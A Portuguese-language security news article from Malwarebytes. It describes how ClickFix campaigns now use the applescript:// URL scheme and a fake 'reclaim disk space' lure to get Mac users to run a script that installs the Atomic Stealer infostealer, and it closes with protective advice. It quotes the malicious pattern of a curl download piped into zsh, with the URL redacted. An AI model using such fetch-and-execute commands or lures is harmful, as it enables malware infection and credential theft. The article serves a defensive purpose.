Notícias

O ClickFix encontra uma nova forma de infectar Macs

por Pieter Arntz | 10 de abril de 2026
Interrupção do script

As campanhas da ClickFix estão buscando alternativas agora que muitos Mac tomaram consciência dos riscos de colar determinados comandos no Terminal.

Pesquisadores descobriram que a ClickFix manteve o mesmo manual de engenharia social, mas contornou completamente o Terminal ao usar o applescript:// Esquema de URL para abrir automaticamente o Script Editor com um script pronto para execução que baixa o Atomic Stealer.

O ClickFix é um método de engenharia social que induz os usuários a infectarem seus próprios dispositivos com malware. Os usuários são instruídos a executar comandos específicos que baixam malware, geralmente um programa de roubo de informações.

Os invasores substituíram “copie e cole no Terminal” por “basta clicar neste botão e executar um script que a Apple preparou para você”.

O isco é a sempre popular frase “Recupere espaço em disco no seu Mac”. Um dos resultados de pesquisa usando o método antigo tinha a seguinte aparência:

Método clássico ClickFix usando o Terminal
Método clássico ClickFix usando o Terminal

Executar um comando curl ofuscado no Terminal é sempre uma má ideia. Mas o que vem a seguir é igualmente perigoso, e imagino que os usuários estejam mais propensos a seguir esse fluxo.

O novo método fica mais ou menos assim:

Novo método ClickFix usando o Editor de Scripts
Novo método ClickFix usando o Editor de Scripts

A principal diferença está na forma como a execução é iniciada: em vez de pedir que você cole comandos assustadores, o site oferece um “AppleScript” de um clique que alega limpar o seu Mac até exibe uma caixa de diálogo falsa informando “24,7 GB liberados”.

Por baixo do capô, o applescript:// O link direto abre o Editor de Scripts com um script de “manutenção” já preenchido. Mas a verdadeira função do script é do shell script "curl -kSsfL <obfuscated URL> | zsh". Isso, na prática, carrega um script de segunda fase, que decodifica outro script, o qual, por fim, baixa o helper (uma variante do Atomic Stealer) e o executa.

O Atomic Stealer, também conhecido como AMOS, é um infostealer popular para o macOS. Mas o Atomic Stealer é apenas a carga útil atual. Amanhã pode ser o MacSync, o Infiniti ou algo novo.

No fim das contas, ainda se trata de uma infecção autoinfligida, já que o usuário está concedendo todas as permissões ao clicar nas caixas de diálogo e executar o script.

Como se manter seguro

Segundo relatos, o ClickFix foi responsável por mais da metade de toda a atividade de carregadores de malware em 2025. Uma das razões para seu sucesso é que as campanhas continuaram — e continuam — a incorporar novosmétodospara enganar os usuários, além de diferentescomandospara evitar a detecção.

Os usuários do macOS Tahoe receberão um aviso contra o uso desses scriptsse o sistema operacional estiver atualizado (versão 26.4 ou posterior).

Portanto, com o ClickFix se espalhando rapidamente e inventando novos métodos o tempo todo, é importante estar atento, ter cuidado e se proteger.

  • Vá com calma. Não seapresse em seguir as instruções de uma página da web ou prompt, especialmente se elas solicitarem que você execute comandos no seu dispositivo ou copie e cole códigos. Os invasores contam com a urgência para contornar seu pensamento crítico, portanto, tenha cuidado com páginas que exigem ação imediata. Páginas sofisticadas do ClickFix adicionam contagens regressivas, contadores de usuários ou outras táticas de pressão para fazer você agir rapidamente.
  • Evite executar comandos ou scripts de fontes não confiáveis. Nuncaexecute códigos ou comandos copiados de sites, e-mails ou mensagens, a menos que confie na fonte e compreenda o objetivo da ação. Verifique as instruções de forma independente. Se um site solicitar que você execute um comando ou realize uma ação técnica, verifique a documentação oficial ou entre em contato com o suporte antes de prosseguir.
  • Limite o uso de copiar e colar para comandos.Digitar manualmenteos comandos em vez de copiar e colar pode reduzir o risco de executar inadvertidamente cargas maliciosas ocultas no texto copiado.
  • Proteja seus dispositivos. Useumasolução antimalwareatualizada e em tempo real com um componente de proteção da web.
  • Informe-se sobre as técnicas de ataque em constante evolução.Compreender que os ataques podem vir de vetores inesperados e evoluir ajuda a manter a vigilância. Continue lendo nosso blog!

Dica profissional:você sabia que o Malwarebytes gratuito Malwarebytes Browser Guard avisa quando um site tenta copiar algo para a sua área de transferência?

Vamos ser sinceros: uma janela anônima tem suas limitações.

Violações de dados, comércio na dark web, fraudes de crédito. Malwarebytes Identity Theft monitora tudo isso, avisa você rapidamente e inclui um seguro contra roubo de identidade. 

Sobre o autor

Pieter Arntz

Pieter Arntz

Pesquisador de inteligência de malware

Foi Microsoft MVP em segurança do consumidor por 12 anos consecutivos. Fala quatro idiomas. Cheira a mogno e a livros encadernados em couro.

ÚLTIMOS ARTIGOS

Insetos
Logotipo da Microsoft

Patch Tuesday de maio de 2026: sem vulnerabilidades zero-day, mas com muitas correções

Maio 13, 2026

A Patch Tuesday de maio pode não ser o grande lançamento que muitos esperavam, mas ainda assim há muitas correções importantes que não devem ser ignoradas.

Notícias
Logotipo Claude

Resultados de pesquisa falsos sobre o Claude levam Mac a um ataque do ClickFix

Maio 12, 2026

Pesquisadores descobriram uma campanha do ClickFix que usa guias de configuração falsos do Claude para induzir Mac a infectarem seus próprios computadores.

Notícias
Um grupo de jovens com aparência feliz

Dados roubados do Canvas foram “devolvidos” após hacker , afirma a Instructure

Maio 12, 2026

A Instructure afirma que os dados roubados do Canvas, que afetaram milhões de alunos e funcionários, foram “devolvidos”. Não é assim que funcionam as violações de segurança.

Artigos relacionados

Ícone dos colaboradores

Contribuintes

Ícone da Central de Ameaças

Centro de Ameaças

Ícone de podcasts

Podcast

Ícone do glossário

Glossário

Ícone de golpes

Golpes